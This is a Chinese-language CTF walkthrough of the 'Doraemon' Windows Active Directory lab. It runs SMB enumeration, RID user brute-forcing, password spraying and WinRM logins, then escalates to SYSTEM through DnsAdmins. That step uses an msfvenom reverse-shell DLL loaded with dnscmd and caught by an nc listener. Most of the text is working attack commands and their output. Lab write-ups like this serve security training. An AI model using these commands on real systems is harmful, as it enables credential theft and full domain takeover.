TheHackersLabs Doraemon Walkthrough

靶场:The Hackers Labs
地址:https://thehackerslabs.com/doraemon/
系统:windows
内容:smb brute、DnsAmins权限提权

首先扫描端口。

└─$ nmap -sV -sC -Pn -p-  -oN port.log $IP                                                                                                                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 13:59 CST                                                                                                            
Nmap scan report for 192.168.56.154                                                                                                                                           
Host is up (0.00094s latency).                                                                                                                                                
Not shown: 65510 closed tcp ports (reset)                                                                                                                                     
PORT      STATE SERVICE      VERSION                                                                                                                                          
53/tcp    open  domain       Simple DNS Plus                                                                                                                                  
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 11:59:59Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  msrpc        Microsoft Windows RPC
49693/tcp open  msrpc        Microsoft Windows RPC
49715/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2024-11-09T12:00:53
|_  start_date: 2024-11-09T11:49:47
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 5h39m59s, deviation: 34m38s, median: 5h59m59s
| smb-os-discovery: 
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: WIN-VRU3GG3DPLJ
|   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
|   Domain name: DORAEMON.THL
|   Forest name: DORAEMON.THL
|   FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL
|_  System time: 2024-11-09T13:00:53+01:00
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c0:aa:e7 (VMware)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

以空账户查看smb目录,gorrocoptero为可读。

─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\null: 
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  [+] Enumerated shares
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  gorrocoptero    READ            
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  IPC$                            IPC remota
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  NETLOGON                        Recurso compartido del servidor de inicio de sesión 
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  SYSVOL                          Recurso compartido del servidor de inicio de sesión 
SMB         192.168.56.154  445    WIN-VRU3GG3DPLJ  Users

爆破出所有的用户名,并保存为names.txt。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Doraemon
Nobita
Shizuka
Gigante
Suneo

保存所有的组名(其实也不用)。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeGroup\))'
Enterprise Domain Controllers de sólo lectura
Admins. del dominio
Usuarios del dominio
Invitados del dominio
Equipos del dominio
Controladores de dominio
Administradores de esquema
Administradores de empresas
Propietarios del creador de directivas de grupo
Controladores de dominio de sólo lectura
Controladores de dominio clonables
Protected Users
Administradores clave
Administradores clave de la organización
DnsAdmins
DnsUpdateProx

刚才smb共享目录里那个文件是一首我读不懂的对话,把它里面的每个词都拆开做成pass.txt,然后和刚才的用户名进行匹配。

└─$ cat kedadawapa.txt | tr -d ',.?!' | tr ' ' '\n' | sort -u > pass.txt
└─$ netexec smb $IP -u names.txt -p pass.txt --continue-on-success |grep '[+]'
SMB                      192.168.56.154  445    WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Invitado: (Guest)
SMB                      192.168.56.154  445    WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\DefaultAccount: (Guest)
SMB                      192.168.56.154  445    WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Doraemon:Dorayaki1

检测一下,Doraemon用户可以登录。

└─$ netexec winrm $IP -u Doraemon -p Dorayaki1
WINRM       192.168.56.154  5985   WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL)
WINRM       192.168.56.154  5985   WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Doraemon:Dorayaki1 (Pwn3d!)

登录Doraemon的shell,但并没有直接可以用于提权的权限。

└─$ evil-winrm -i $IP -u  Doraemon -p Dorayaki1                                                                                                                               

Evil-WinRM shell v3.7                                                                                                                                                         

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                       

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                         

Info: Establishing connection to remote endpoint                                                                                                                              
*Evil-WinRM* PS C:\Users\Doraemon\Documents> whoami /priv                                                                                                                     

INFORMACIàN DE PRIVILEGIOS                                                                                                                                                    
--------------------------

Nombre de privilegio          Descripci¢n                                  Estado
============================= ============================================ ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio     Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada

浏览Links目录,发现一个隐藏文件。注意dir命令要加上-force参数。

*Evil-WinRM* PS C:\Users\Doraemon\Links> dir
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir -force

    Directorio: C:\Users\Doraemon\Links

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-h--        10/1/2024  12:35 PM             58 Carta de amor a Shizuka.txt
*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345

文件内容是Suneo的密码。

└─$ netexec winrm $IP -u names.txt  -p ShizukaTeAmobb12345 | grep '[+]'
WINRM                    192.168.56.154  5985   WIN-VRU3GG3DPLJ  [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345 (Pwn3d!)

登录Suneo的shell后,可以得到user flag。
为浏览信息方便,上传SharpHound,下载相关信息。在本机建立smb服务器。

└─$ impacket-smbserver -smb2support kali /opt/SharpHound            

在客户机运行sharphound来收集域信息。

*Evil-WinRM* PS C:\Users\Doraemon\Documents> \\192.168.56.101\kali\SharpHound.exe
...
*Evil-WinRM* PS C:\Users\Doraemon\Documents> dir

    Directorio: C:\Users\Doraemon\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/9/2024   2:25 PM          12205 20241109142502_BloodHound.zip
-a----        11/9/2024   2:25 PM           8586 MjhiMTQyYmItYzllMS00ODVmLWFkZWItNmIwMGE2NTIyYWIx.bin

查看suneo用户,属于4个组,其中有一个DnsAdmin组。

*Evil-WinRM* PS C:\Users\Suneo\Documents> net user suneo
...
Miembros del grupo local                   *Dorayaki
                                           *Usuarios de administr
Miembros del grupo global                  *DnsAdmins
                                           *Usuarios del dominio

DnsAdmins的提权可参考如下文章。

https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
https://0xstarlight.github.io/posts/Active-Directory-Domain-Priv-Esc/

先用msfvenom生成一个反弹shell的dll文件。

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=1234 -f dll > malicious.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes

在靶机上运行下面的命令,用于加载dll文件到dns服务,并重启dns服务。

*Evil-WinRM* PS C:\Users\Suneo\Documents> dnscmd 127.0.0.1 /config /serverlevelplugindll C:\Users\Suneo\Documents\malicious.dll

Propiedad del Registro serverlevelplugindll restablecida correctamente.
Comando completado correctamente.

C:\Users\Suneo\Documents>
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe stop dns

NOMBRE_SERVICIO: dns
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        CàD_SALIDA_WIN32   : 0  (0x0)
        CàD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIàN_INICIO  : 0x0
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe start dns

NOMBRE_SERVICIO: dns
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        CàD_SALIDA_WIN32   : 0  (0x0)
        CàD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x1
        INDICACIàN_INICIO  : 0x4e20
        PID                : 3700
        MARCAS         :

本机监听相关端口,可以得到root shell。

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.154] 50091
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>whoami /priv
whoami /priv

INFORMACIN DE PRIVILEGIOS
--------------------------

Nombre de privilegio    Descripcin                                  Estado    
======================= ============================================ ==========
SeAuditPrivilege        Generar auditoras de seguridad              Habilitada
SeChangeNotifyPrivilege Omitir comprobacin de recorrido             Habilitada
SeImpersonatePrivilege  Suplantar a un cliente tras la autenticacin Habilitada
SeCreateGlobalPrivilege Crear objetos globales                       Habilitada

C:\Windows\system32>whoami
whoami
nt authority\system

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注